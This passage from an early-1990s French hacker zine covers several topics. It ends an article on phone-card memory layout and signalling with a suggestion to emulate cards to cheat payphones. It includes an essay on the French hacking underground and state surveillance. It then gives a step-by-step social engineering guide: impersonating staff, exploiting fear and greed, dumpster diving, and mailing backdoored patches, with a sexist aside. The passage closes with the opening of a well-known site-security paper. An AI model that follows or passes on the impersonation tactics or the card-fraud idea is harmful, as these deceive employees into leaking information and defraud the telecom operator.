  1723. Bytes       Bits      Binary     Hexa
  1724.  
  1725.                     +-----------+-----+
  1726.   1        1 --> 8  |           |     | ---> Code personnalisé.
  1727.                     +-----------+-----+
  1728.   2       9 --> 16  | 0000 0011 | $03 | ---> Télécarte
  1729.                     +-----------+-----+
  1730.   3      17 --> 24  |           |     |
  1731.                     +-----------+-----+
  1732.   4      25 --> 32  |           |     |
  1733.                     +-----------+-----+
  1734.   5      33 --> 40  |           |     |
  1735.                     +-----------+-----+
  1736.   6      41 --> 48  |           |     |
  1737.                     +-----------+-----+
  1738.   7      49 --> 56  |           |     |
  1739.                     +-----------+-----+
  1740.   8      57 --> 64  |           |     |
  1741.                     +-----------+-----+
  1742.   9      65 --> 72  |           |     |
  1743.                     +-----------+-----+
  1744.  10      73 --> 80  |           |     |
  1745.                     +-----------+-----+
  1746.  11      81 --> 88  | 0001 0000 | $10 |
  1747.                     +-----------+-----+
  1748.  12      89 --> 96  | 0001 0011 | $13 | ---> 120 unités
  1749.                     | 0000 0110 | $06 | --->  50 unités
  1750.                     | 0000 0101 | $05 | --->  40 unités (plus utilisé)
  1751.                     +-----------+-----+
  1752.  13-31  97 --> 248  |           |     | ---> Zone de transaction ou chaque
  1753.                     |           |     |      bit represente une unité
  1754.                     |           |     |
  1755.                     |           |     |
  1756.                     |           |     |
  1757.                     |           |     |
  1758.                     |           |     |
  1759.                     +-----------+-----+
  1760.  32    249 --> 256  | 1111 1111 | $FF | ---> Carte vide
  1761.                     +-----------+-----+
  1762.  
  1763. En voila assez pour la partie logicielle, on va voir comment on peu acceder
  1764. aux données.
  1765.  
  1766.  
  1767.  
  1768.  
  1769.     Afnor (Franco-Francais)                        ISO (Internatinnal)
  1770.      En haut à gauche                                  Milieu Gauche
  1771.      (abandonné de puis peu)
  1772.  
  1773.  -------------+-------------                 -------------+-------------
  1774. |   8         |         4   |               |   1         |         5   |
  1775. |             |             |               |             |             |
  1776. +-------\     |     /-------+               +-------\     |     /-------+
  1777. |   7    +----+----+    3   |               |   2    +----+    +    6   |
  1778. |        |         |        |               |        |         |        |
  1779. +--------|         |--------+               +--------|         |--------+
  1780. |   6    |         |    2   |               |   3    |         |    7   |
  1781. |        +    +----+        |               |        +----+----+        |
  1782. +-------/     |     \-------+               +-------/     |     \-------+
  1783. |   5         |         1   |               |   4         |         8   |
  1784. |             |             |               |             |             |
  1785.  -------------+-------------                 -------------+-------------
  1786.  
  1787.  
  1788. PINOUT:    1 : Vcc = 5V                5 : Gnd (0V)
  1789.            2 : R/W(Lire='1':Ecrire='0')6 : Vpp = 21V (Tension de prog)
  1790.            3 : Clock (Horloge)         7 : I/O (Entrée/Sortie)
  1791.            4 : Reset                   8 : Fusible
  1792.  
  1793.  
  1794.         - Time diagrams:
  1795.  
  1796. +21V                                    _____________
  1797. +5V____________________________________|             |_________________ Vpp
  1798.                                        :             :
  1799. +5V                 ___________________:_____________:_________________ Reset
  1800. 0V ________________|                   :             :
  1801.                    :                   :             :
  1802. +5V    ____        :      ____         :       ______:______
  1803. 0V ___|    |_______:_____|    |________:______|      :      |__________ Clock
  1804.       :    :       :     :    :        :      :      :      :
  1805. +5V   :    :       :     :    :        :______:______:      :           _
  1806. 0V ___:____:_______:_____:____:________|      :      |______:__________ R/W
  1807.       :    :       :     :    :        :      :      :      :
  1808. +5V   :    :       :_____:    :________:      :      :      :__________
  1809. 0V  XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
  1810.        :    :       :     :    :        :<-----><---->:      :
  1811.        :    :       :     :    :        :10 to   10 to       :
  1812.        :    :       :     :    :        :50 ms   50ms        :
  1813.         Reset        Bit 1        Bit2       Ecriture          Bit 3
  1814.  
  1815.  
  1816. Vous avez donc tous les éléments en main pour comprendre le fonctionnement de
  1817. la carte, dans un prochain numéro, il y aura un lecteur/ecriveur de carte et
  1818. peut etre un "Simulateur de carte téléphonique reprogrammable à volonté".
  1819.  
  1820. Pour répondre à vos questions voici l'extrait d'un petit dialogue qui a eu
  1821. lieu il y a deja quelque temps chez FB apres un détour au bar Le Terminus:
  1822.  
  1823. Si on peut ecrire sur la carte c'est super on peut rajouter des unités!
  1824.  ARGHH! On peut écrire que des zeros donc déduire des unités!
  1825.  
  1826. Comment on fait pour ecrire des '1'?
  1827.  Il faut effacer l'eprom aux UV
  1828.  
  1829. Ben on fait ca ! non?
  1830.  Ben la resine qu'il y a sur puce est anti UV
  1831.  
  1832. On enlève la résine!
  1833.  En admettant que tu puisses enlever la resine sans endommager le chip, tu
  1834.  efface TOUT y compris la zone constructeur, que tu ne peux reécrire puisque
  1835.  le fusible a été grillé!!!!
  1836.  
  1837. On remet le fusible!
  1838.  Bien sur avec tes petits doigts habiles tu recable une connextion de 5 µm
  1839.  ca y ait MD tu as trouvé le system :-(
  1840.  
  1841. Le moyen n'est pas là, il faut faire croire à la cabine qu'elle est en
  1842. presence d'une vraie carte... Que pensez vous d'une RAM avec quelques compos
  1843. logique autours??? Voila a vous de vous débrouiller j'ai donné l'idée générale
  1844. il ne vous manque plus que la réalisation! Rendez vous dans le prochain
  1845. numéro......
  1846. [Addendum de chieur de service, je me suis nommé NeurAlien, vous avez remarque
  1847. que l'on est repassé du système de tambour (vous savez: inserez la carte et
  1848. rabatez le couvercle) à un système normal sans tambour.  Bien sur, le tambour
  1849. servait à éviter que les trains de cables puissent etre faits.  Alors ya des
  1850. Ueber-Phreakers qui ont fait des fausses cartes avec des composants en CMS.
  1851. Et donc comme tout tenait sur une carte, FT=baisé car plus de train de cables.
  1852. Donc eux aussi ont rusé: Ils ont un système genre reflectomètre qui si au lieu
  1853. d'etre en contact direct avec la carte, il y a quelques centimetre de cable qui
  1854. les menes jusqu'aux contacts normaux d'une vraie carte: ca foire, la carte est
  1855. rejetée!   Alors je sais pas comment ils ont fait ca mais en tout cas c'est
  1856. assez chaud. hehe, je suis pas électronicien mais on m'a dit que ca se faisait
  1857. facilement. ++NeurAlien]
  1858.  
  1859. Merci à Marc d'avoir passe quelques heures dans certains fichiers de config, à
  1860. EFZ TEAM de faire vivre ce zine, et à XXXXX pour mon defunt acces INET.
  1861. [je protège les innocents, pas de pseudos connus et identifiables ds N0 WAY]
  1862. D. O'CONNELL A.K.A. HOPPY
  1863.  
  1864.                                -%!% N0 Way %!%-
  1865.  
  1866.                       Volume I,   Numéro 3,  Partie 3.9
  1867.  
  1868.  
  1869. Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
  1870. diffuse publiquement.
  1871. PS: ca date, maintenant l'underground informatique est bien développé mais non
  1872. encore interconnecté.
  1873.  
  1874. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1875. = CORE-DUMP  |  Volume I  |  Issue 2  |  Phile 6  |  [NeurAlien]  12/09/92  =
  1876. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1877.              ._ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ .
  1878.             /_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /|
  1879.             :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_: |
  1880.             :_:         Pourquoi          :_: |
  1881.             :_: L'Underground Informatique:_: |
  1882.             :_:          est-il           :_: |
  1883.             :_:      sous développé?      :_: |
  1884.             :_:         en France         :_: |
  1885.             :_:_ _ _ _ _ _ _ _ _ _ _ _ _ _:_: |
  1886.             :_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:/'
  1887.  
  1888.                   Par NeurAlien
  1889.  
  1890.  
  1891.      J'ai choisi de faire cet article sur la vie de l'Underground
  1892. Informatique Francais après avoir réfléchi au fait qu'il se créait parfois
  1893. dans des endroits très reculés et très peu ouverts du réseau, des petites
  1894. "iles" où un petit groupe de hackers ou de phone phreaks se rencontrent, mais
  1895. que jamais il n'y a eu d'underground organisé et qui dure dans le temps
  1896. comparable à ceux formés aux USA ou en Allemagne.
  1897.  
  1898. >Qu'est-ce que l'Underground:
  1899. ============================
  1900.     Le concept d'underground informatique est venu en premier avec le
  1901. Chaos Computers Club de Hambourg qui a fait beaucoup de réflexions poussées
  1902. sur les hackers et les phone phreaks.
  1903. En fait, l'Underground n'est ni un serveur, ni un journal, ni un groupe
  1904. comme les LODs ou le CCCH. L'Underground est un ensemble de relations et
  1905. d'histoires qui se répètent et se perpétuent à travers des discussions et
  1906. des journaux pour H/P et ainsi, cela forme un petit "monde" totalement
  1907. virtuel avec ses propres règles jamais écrites mais respectées comme
  1908. "Ne jamais effacer de donnée sur un système d'information a part pour
  1909. couvrir sa trace". (cf: article 4 du Phrack 22 par The Mentor)
  1910. Aux USA, un vaste Underground H/P existe;formé de Phracks Inc, de Computer
  1911. Underground Digest, de différents groupes qui ont toujours étés liés d'une
  1912. manière quelconque. Il y a toujours eu un contact entre les anciens "mate"
  1913. (les meilleurs) qui se sont fait prendre ou qui se sont retirés et les
  1914. jeunes hackers et phone phreaks qui arrivaient dans l'Underground.
  1915. Il y a toujours eu un souci de continuité de la part de l'Underground aux
  1916. USA: les anciens forment des nouveaux avant de s'en aller.
  1917.     Mais pour la France?  On pourrait presque dire qu'il n'y a jamais
  1918. eu d'ancien.
  1919.  
  1920. >Le problème de l'underground Francais:
  1921. ======================================
  1922.     L'Underground Francais n'a en fait jamais existé en tant que monde
  1923. durable. De multiples petits "ilots" comme NICK au sein de MCOM, les
  1924. hackers de RIBOUREL, Les SLANS sur VMF/MOP, TeKila's Underground dans
  1925. le club TELECOMS sur RTEL ou encore "le royaume télématique" sur la section
  1926. 'PROBLEMES DE LIAISON SPECIALISE' du serveur de la DTRN ainsi que PIRATEL
  1927. sur un serveur gratuit videotext.
  1928. Tous ces micro-underground n'ont duré que quelques mois tout au plus.
  1929. Bien sûr, vous me direz qu'il existe bien des serveur comme AATEL et PIRATE
  1930. sur le réseau x25. Mais leur plus grand problème est le maillage organisé
  1931. et méthodique que la DST a tissé sur les réseaux Francais.
  1932.     Qu'est ce que la DST. C'est la Direction de la Surveillance du
  1933. Territoire dont une grande partie très bien équipée et très bien organisée
  1934. s'occupe du piratage informatique.
  1935. Grâce à leur "réseau" d'informateur et de surveillance, ils sont capables de
  1936. détecter certaines activités tendancieuses sur le réseau Télétel, X25,
  1937. ou même RTC. (l'Internet est très mal maitrisé!! héhéhé !)
  1938.     Je vais vous raconter une anecdote qui illustre bien l'étendue de leur
  1939. pouvoir. Suite au piratage d'une grande boite d'informatique de France, un
  1940. groupe de hacker a été "tracké" par la DST. Dans ce groupe, il y avait un
  1941. certain "DIEU" (le pseudonyme), tristement célèbre par son irrespect envers
  1942. tous les autres hackers. Ce dernier était recherché activement et pourtant,
  1943. personne de la DST n'arrivait à le prendre.
  1944. Un jour, un connecté sur un petit micro-serveur RTC pris pour deconner le
  1945. pseudo DIEU. Quelques jours plus tard, deux inspecteur débarquaient à la
  1946. maison du SYSOP de ce micro-serveur pour savoir qui était ce fameux DIEU.
  1947. Manque de pot pour la DST, ce DIEU en question n'était absolument pas le
  1948. bon!
  1949. (information supplémentaire: le vrai DIEU, le hacker, a quand même été
  1950. retrouvé au bout de 3 ou 4 mois d'enquêtes intensives.)
  1951.     La DST a des relations partout et est réputée pour tous savoir.
  1952. Connaissez vous 1984 de George Orwell???? Vous connaissez alors BIG BROTHER.
  1953. La DST, c'est un peu ça mais en moins fort... Néanmoins, vous pouvez être
  1954. sur que s'ils veulent savoir quelque chose, il seront au courant, à quelque
  1955. prix que cela leur coute... Ce sont avec les RG (renseignements généraux) les
  1956. oreilles de l'état; à part que pour la DST, il y a eu des BRAS de rajoutés...
  1957. Quand au "cerveaux", ils ne semblent pas être à la traine dans cet outils
  1958. du pouvoir.
  1959.     On comprends donc mieux pourquoi les hackers sont vite arrêtés s'il
  1960. y a pleinte de portée.
  1961. Dès le début, lors d'une affaire de piratage informatique, c'est la DST qui
  1962. s'en occupe plus que la PJ!  La DST fait alors un travail méthodique et
  1963. complet d'audit pour traquer le hacker. Le hacker ensuite recoit une visite
  1964. qui termine en général l'enquête sur le hacker. Là, les inspecteurs de la
  1965. DST font "cracher" tout ce dont ils ont besoin au hacker.
  1966. Un micro lors de l'interrogatoire est sans aucun doute possible installé.
  1967. Bien sur, les V (petit surnom pour la DST) ne se limitent pas à des questions
  1968. uniquement sur l'enquête en cours...  Ils essayent d'avoir toutes les infos
  1969. possibles sur les autres hackers pour que cela leur facilite la tache s'ils
  1970. doivent trouver d'autre hackers.
  1971. Le matériel du hacker est ensuite saisi, et hop, ils disparaissent de votre
  1972. vie, sans aucune autre trace qu'un grand manque au niveau matériel et une
  1973. lourde menace si jamais on s'avisait de recommencer.
  1974. Le conseil nous est aussi donné de ne pas remettre les pieds sur un serveur
  1975. avant deux mois au moins.
  1976. Apres la partie de la DST, si l'affaire à quelque chose à voir avec une
  1977. fraude ou un quelconque gain d'argent, alors vous pouvez être sûr d'avoir
  1978. une visite de la part de la PJ qui ont des méthodes beaucoup moins calmes
  1979. que la DST.
  1980. S'il n'y a pas eu plainte par contre mais que selon eux vous devenez trop
  1981. dangereux, alors ils font une descente chez vous, il vous font une grande
  1982. frayeur et s'arrangent pour que vous rencardiez et informiez sur les
  1983. hackers encore actifs pendant plusieurs mois, voir des ANNEES !!!
  1984.  
  1985.     L'Underground est ainsi decimé, et il est bien sûr impossible
  1986. de prévoir si vous êtes ou pas sur la "liste d'attente pour la casserole" de
  1987. la DST.  Ainsi, il n'y a pas de moyen de véritablement "transmettre" son
  1988. savoir en toute sécurité.
  1989.  
  1990. >Les moyens et les méthodes de la DST:
  1991. =====================================
  1992.        La DST a vraiment beaucoup de moyens pour tracker un pirate.
  1993. Par exemple, ils ont une équipe de  spécialiste en informatique  et
  1994. qui peuvent  aider à tout moment les inspecteurs dans leur enquete.
  1995. Ils savent précisement comment agissent les  hackers et connaissent
  1996. en général leurs  habitudes ( chevaux de troie - crackers de mot de
  1997. passe - worms - backdoors - passes & méthodes )
  1998. Si par exemple, ils ne sont pas sur qu'une personne à telle adresse
  1999. soit un hacker,  ils peuvent  envoyer des  personnes  déguisées  en
  2000. femme de ménage (je ne suis pas parano) sans aucun problème. Il ont
  2001. des  relations qui  leur  permettent d'avoir  * n'importe *  quelle
  2002. information provenant d'une école par le censeur ou même les profs.
  2003. Les écoutes sont bien sûr monaie  courante et ils n'ont pas  besoin
  2004. faire des écoutes  sauvages...  Une carte de la  DST ouvre tous les
  2005. Centres Principaux d'Exploitation sans problème.
  2006. Ils utilisent d'autre part une technologie de pointe au niveau de
  2007. l'espionnage informatique. Il s'agit du TEMPEST.
  2008. Le principe en est ma foi très simple. Vous savez certainnement que
  2009. tout courant qui passe dans un fil éléctrique non-blindé produit un
  2010. champ magnétique et qu'un circuit electronique en fonctionnement
  2011. possède des composants électroniques qui oscillent quand ils sont
  2012. dans certains états et ainsi emettent soit sur une frequence
  2013. radioéléctrique soit avec un signal électromagnique. Ces signaux
  2014. peuvent être détecté de très loin grâce à des instruments
  2015. de haute précision. On peut très bien décoder les caractères frappé
  2016. sur un clavier qui  transitent par le cable ou bien ce qui s'affiche
  2017. sur un écran.
  2018. Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR -
  2019. ANTENNE qui permet de recevoir en clair les informations provenant
  2020. de l'ordinateur distant sans aucune liaison que ce soit (à part
  2021. l'air).
  2022. Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques
  2023. durs, les minitels et les cables modem (jamais sur le CPU).
  2024.  
  2025.      Quand à leurs méthodes, eh bien elles sont simples et efficaces
  2026. en général.
  2027. Tout d'abord, il y a une surveillance constante des serveurs à
  2028. risques comme ceux des anciens pirates, des serveurs comme RTEL où,
  2029. d'une manière ou d'une autre, il s'arrangent pour "tenir" le SYSOP
  2030. et lui imposer un scan sur des mots-cles comme "hacker", "blue box"
  2031. "pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1).
  2032. Bien sur, si un club leur parait suspect, ils peuvent aussitot
  2033. passer un coup de fil au SYSOP et lui demander le Pass.
  2034. Vous pensez bien aussi que toutes les adresses laissées en BAL sont
  2035. relevées.
  2036. (liste des serveurs écoutés & filtrés: QSD/The Line, RTEL, CHEZ,
  2037. TEASER et bien sûr RTEL.)
  2038. (liste des serveurs très certainnements soumis à ces pratiques:
  2039. ELIOTT, POUR, PIRATE, AATEL)
  2040. Ils s'arrangent aussi pour récuperer le log des appelants avec les
  2041. adresses des PAVIs correspondants aux pseudos.
  2042. Ainsi, ils ont une table approximative qui donne pour chaque pseudo le
  2043. département d'origine.
  2044.     Une histoire significative de leur méthode est arrivée en
  2045. 1988-1989 avec Jean Claude Michot alors SYSOP de QBBS.
  2046. Si vous vous rappelez bien, QBBS demandait l'adresse et le numéro de
  2047. téléphone de chaque user voulant avoir un compte. Il était précisé que
  2048. cela resterait confidentiel.
  2049. Mais JCM était un pirate (pas un des meilleurs), et de plus, il n'avait
  2050. pas grande morale. JCM donc s'était fait prendre par la DST, et ils ont
  2051. marchandé un abandon des charges vis à vis de son affaire (le
  2052. troc de sa liberté) contre le fichier d'adresse avec la correspondance
  2053. avec le pseudo.
  2054. JCM qui n'est pas très respectable ni honête à préféré divulguer ce
  2055. fichier plutôt que d'assumer son erreur! (non pas d'avoir piraté, sa
  2056. seule erreur est celle de s'être fait prendre à mon sens!)
  2057. Mais je suis sûr que la DST a été très persuasive ce qui peut quelque
  2058. peu nous permettre de le pardonner.
  2059.     La DST quand elle est démunie de moyens de tracking contre une
  2060. personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels
  2061. pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de
  2062. voir avec quelles personnes correspondent le hacker.
  2063. Ils s'arrangent pour trouver les personnes susceptibles sur le serveur
  2064. d'avoir le numéro de téléphone du hacker ou ses coordonnées et ensuite
  2065. font une descente chez ces dites personnes.
  2066. En leur faisant vraiment très très peur et avec leur terrible persuasion,
  2067. ils arrivent presque toujours a faire comprendre a cette personne qu'elle
  2068. n'aura pas d'ennui si elle dit le numéro de tel ou tel pseudo (qui est le
  2069. hacker).
  2070. Encore une bonne raison de ne pas montrer son amitié envers certainne
  2071. personne en public et une encore meilleure raison pour ne jamais, Oh grand
  2072. jamais, donner ses coordonnées ou son numéro de téléphone.
  2073.  
  2074. >La DST et la loi Godfrain:
  2075. ==========================
  2076.     Personnellement, j'en ai beaucoup voulu à la DST pour ses actions
  2077. que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer
  2078. (au point de vue idéologique je parle) à la DST et à ses actions.
  2079. Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais référence
  2080. au système soit-disant "démocratique" non au mouvement politique qui
  2081. pourrait être en place à ce moment. Je ne veux pas traiter de politique
  2082. ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal.
  2083. Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker.
  2084. Cette loi en effet désigne comme délit le fait de venir sur un systême
  2085. d'information. Mais à ce moment, comment différencier un système où l'on
  2086. a le droit d'accèder d'un systême où cela est interdit.
  2087. Un message: "Acces à cet ordinateur interdit aux personnes non autorisées"
  2088. ne suffit pas à mon avis.
  2089. Qui sont les personnes non autorisées?
  2090. De plus, ce genre de message est généralement en Anglais, je ne suis
  2091. absolument pas pour la francisation de tout mais tout le monde ne comprend
  2092. pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94]
  2093. De toute facon, la loi reste la même pour les systèmes ayant une bannière de
  2094. prévention que pour les systèmes sans. Ainsi, demain on peut venir m'arrèter
  2095. pour être allé sur RTEL ou sur TEASER!
  2096. Est-ce normal?
  2097. A ce moment, c'est la porte ouverte à la loi de classe... En effet, une telle
  2098. loi sera applicable à toute personne et seule les personnes gênantes pour
  2099. l'état seront visées.
  2100. Dans cette vision, on aura bientôt plus besoin de justifier une arrestation.
  2101. Et pourtant ce n'est pas "1984", ce sont seulement les conséquences de 1988
  2102. (date du vote de cette loi).
  2103. J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient
  2104. l'ampleur de leur vote.
  2105.  
  2106. >CONCLUSION:
  2107. ===========
  2108.     Nous possédons quand même des moyens de nous faire entendre.
  2109. La branche active des H / P peut laisser des messages d'informations sur les
  2110. systêmes "ouverts" et la branche médiatique peut informer les mass-médias.
  2111. Mais là encore, le gouvernement aura beaucoup de mal à revenir sur une de
  2112. ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour
  2113. persuader les Français du bien fondé de cette loi.
  2114.     Nous avons même la possibilité de faire un lobbie comme aux USA, un
  2115. groupe de pression et faire changer cette loi. Mais tout reste à faire et
  2116. nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et
  2117. d'argent faire des lois répressives donnant aux juges-pantin les pleins
  2118. pouvoirs sur nos existences.
  2119.     L'image de l'underground a été trop souvent terni par les sociétés
  2120. ayant peur de notre capacité à montrer leurs incompétences et leurs
  2121. manipulations douteuses et aussi par les gouvernements voulant brider et
  2122. dominer les moyens informatique et, pour cela, les limitèrent à leurs
  2123. technocrates et leurs industries de pointe qu'ils controlent déja.
  2124.     Imaginez seulement le réseau étendu à chaque citoyen d'un pays.
  2125. Ce serait la libre discussion et avec quelques règles pour rendre le réseau
  2126. viable, personne n'aurait plus à faire la guerre pour faire entendre son
  2127. opinion.  Ne serait-ce pas là la démocratie?
  2128.  
  2129.     Il est temps de montrer cette crasse politique et économique qui
  2130. a déja sérieusement limité l'extension de ces merveilleuses technologies.
  2131. Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites
  2132. entendre votre opinion. Nous somme une force qui peut très bien libérer
  2133. les réseaux de la main-mise des sociétés et de l'état.
  2134.  
  2135.  
  2136.        L I B E R O N S    L E S    R E S E A U X    !   !   !
  2137.  
  2138.                               free the net !
  2139.  
  2140.  
  2141.                                -%!% N0 Way %!%-
  2142.  
  2143.                       Volume I,   Numéro 3,  Partie 3.10
  2144.  
  2145.  
  2146.                                      ><
  2147.  
  2148.          :O :o :I :! :/   L'art du social engineering   :O :o :I :! :/
  2149.  
  2150.                                      ><
  2151.  
  2152.                                 par NeurAlien
  2153.  
  2154.         Si utile contre les grosses entreprise "à la big brother", le social
  2155. engineering permet d'attaquer un des points les plus faible de la société:
  2156. le personnel.
  2157.  
  2158.         Je vais vous enseigner ici les choses que j'ai connue d'une pratique
  2159. courante et de l'enseignement de The Dude, maitre en l'art du social
  2160. engineering à Hack-Tic en Hollande.
  2161.  
  2162.         Tout d'abord, le concept.  Le social engineering couremment abrevié SE
  2163. est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
  2164. sur n'importe quoi.
  2165. Pour cela, il faut etre convaicant, réagir comme la vraie personne et surtout
  2166. utiliser beaucoup de psychologie.
  2167.  
  2168. Exemple de SE classique:
  2169. Employée de FT au service exterieur: "France telecom bonjour,"
  2170. Hacker: "Bonjour, Monsieur Levallois du CPE d'Orléans" [Toujours essayer de
  2171.                                                         placer le maximum
  2172.                                                         d'acronymes dans la
  2173.                                                         conversation]
  2174. H: "Nous avons besoin de la liste des préfixes de numéro vert internationaux
  2175.     par pays car nous avons un problème avec un des carriers."
  2176. FT: "Pardon? Je ne comprends pas bien. "
  2177. H: "J'ai besoin de la liste des 0590 indiquant le pays selon le préfixe!"
  2178. FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
  2179. [ Et voila, c'est gagné ! ]
  2180.  
  2181.                         LA REGLE ULTIME DE CET ART
  2182.  
  2183.         Il y a une chose et une seule qui vous garantira une maitrise parfaite
  2184. des correspondants lors d'une séance de SE, c'est la PRATIQUE.
  2185. On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
  2186. on ne sera jamais un serrurier.
  2187.  
  2188.         Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
  2189. peuvent y mettre et lancez vous.
  2190.  
  2191. Quelques règles de base:
  2192. =======================
  2193. - preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
  2194.   vous voulez et preparant des reponses toutes prêtes pour certaines questions
  2195.   bateaux.  Mettez au point le scenario, votre nom, ce que vous voulez.
  2196. - Toujours garder l'initiative dans la conversation: c'est vous qui posez les
  2197.   questions.
  2198. - Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
  2199.   de 13 ans.
  2200. - ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
  2201.   qui vous dérange.
  2202. - faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
  2203.   résultats si vous le faites tout le temps d'une cabine sans préparation.
  2204. - plus on a d'informations pointues sur la société, plus le SE est possible.
  2205.   Il est des fois TRES fructueux de faire les poubelles de la société avant
  2206.   d'essayer le SE sur ses employés.
  2207.  
  2208. Quelques scénarios qui marchent:
  2209. ===============================
  2210. vous pouvez vous faire passer pour
  2211. . utilisateur/acheteur
  2212. . personne connue
  2213. . urgence/flic/docteur
  2214. . questionnaire/enquête
  2215. . pour la presse, ca marche tres souvent mais on ne recoit pas d'information
  2216.   détaillée.
  2217. Il faut aussi jouer sur les sentiments de votre correspondant:
  2218. - la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
  2219.            ennuis: foudres du patron, (pour l'employé)
  2220.                    fisc sur le dos, (pour le petit patron d'une PME)
  2221.                    arrestation, (pour un individu)
  2222.                    coupure du téléphone,
  2223.                    coupure EDF...
  2224. - plaisir: collaboration contre cadeau ex: questionnaire avec un
  2225.   &greedy  cadeau au bout si les reponses semblent véritable en
  2226.   expliquant que c'est parce beaucoup de monde ne répond pas
  2227.   en toute honneteté.
  2228.  On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
  2229. necessitant une réponse immédiate.
  2230.  Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
  2231. interressant.
  2232.  Etre à deux peut être utile car ainsi si il y a un probleme, vous dites:
  2233. "bon, je vous passe mon supérieur mais il ne va pas être satisfait"
  2234. appuyez sur une touche du téléphone et envoyez une petite musique directement
  2235. au telephone."
  2236.  Ne pas dire que vous etes de la tele: cela ne fait pas reel!
  2237.  Pour un questionnaire, il peut être interressant de noyer les questions
  2238. interressantes dans un flot de question ininterressantes.
  2239. Un bon plan pour un coup de fil est:
  2240.  - depart lent ou on explique bien
  2241.  - des que la personne cède, on accélère le rythme pour qu'elle reste dans
  2242.    cet état d'esprit.
  2243. Un autre est d'envoyer des patchs constructeurs par la poste concernant des
  2244.  failles de sécurité avec des backdoor dans les patchs.
  2245. On peut aussi essayer de simuler un appel de la sécurité et d'envoyer un login.
  2246. Il y a aussi la possibilité de se faire passer pour la femme d'un informaticien
  2247. qui lui a demandé de télécharger un fichier depuis son téléphone de voiture
  2248. pour qu'il puisse aller directement à un ses rendez vous apres etre passer chez
  2249. lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
  2250. passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
  2251. généralement prises pour des burnes en informatique.
  2252. Utilisez les idiots.
  2253.  
  2254. En cas de problème lors de la conversation:
  2255. ==========================================
  2256. Si on vous demande "Pourquoi voulez vous ceci..."
  2257. 2 règles: - toujours répondre
  2258.           - emphase sur le "PARCE QUE" (psycho involved)
  2259. (réponse bateau : "on en a besoin pour...." )
  2260. Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
  2261.  pour eux aussi.
  2262. Si votre correspondant refuse de vous répondre, demandez leur superviseur
  2263.  ou supérieur.
  2264.  
  2265. Les bonnes cibles:
  2266. =================
  2267.         Le SE dépend énormément de votre adaptation à la personne qui est à
  2268. l'autre bout du fil.  Vous devez toujours être en position de supériorité.
  2269. Pour cela, il faut déja attaquer des personnes qui ont l'habitude de recevoir
  2270. des ordres.
  2271.  
  2272.   Ainsi, il est préférable de ne pas parler à l'administrateur mais
  2273. plutot à son assistant.
  2274.  
  2275. Bibliographie:
  2276. =============
  2277. Pr. Zuin "The first 4/5 minutes"
  2278. Dale Carnegie "Hoz to win friends and influence people"
  2279. Baladin Press "The private handbook"
  2280.  
  2281.                                -%!% N0 Way %!%-
  2282.  
  2283.                       Volume I,   Numéro 3,  Partie 3.11
  2284.  
  2285.  
  2286. Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type
  2287.       de hacking que l'on peut faire.
  2288.       C'est vraiment un document EXCELLENT !!
  2289.                              _       _       _
  2290.  
  2291.            _Improving the Security of Your Site by Breaking Into it_
  2292.  
  2293.     Dan Farmer              Wietse Venema
  2294.     Sun Microsystems        Eindhoven University of Technology
  2295.     zen@sun.com             wietse@wzv.win.tue.nl
  2296.  
  2297. Introduction
  2298. ------------
  2299.  
  2300. Every day, all over the world, computer networks and hosts are being
  2301. broken into.  The level of sophistication of these attacks varies
  2302. widely; while it is generally believed that most break-ins succeed due
  2303. to weak passwords, there are still a large number of intrusions that use
  2304. more advanced techniques to break in.  Less is known about the latter
  2305. types of break-ins, because by their very nature they are much harder to
  2306. detect.
  2307.  
  2308. -----
  2309.  
  2310. CERT.  SRI.  The Nic.  NCSC.  RSA.  NASA.  MIT.  Uunet.  Berkeley.
  2311. Purdue.  Sun.  You name it, we've seen it broken into.  Anything that is
  2312. on the Internet (and many that isn't) seems to be fairly easy game.  Are
  2313. these targets unusual?  What happened?
  2314.  
  2315. Fade to...
  2316.  
  2317. A young boy, with greasy blonde hair, sitting in a dark room.  The room
  2318. is illuminated only by the luminescense of the C64's 40 character
  2319. screen.  Taking another long drag from his Benson and Hedges cigarette,
  2320. the weary system cracker telnets to the next faceless ".mil" site on his
  2321. hit list.  "guest -- guest", "root -- root", and "system -- manager" all
  2322. fail.  No matter.  He has all night... he pencils the host off of his
  2323. list, and tiredly types in the next potential victim...
  2324.  
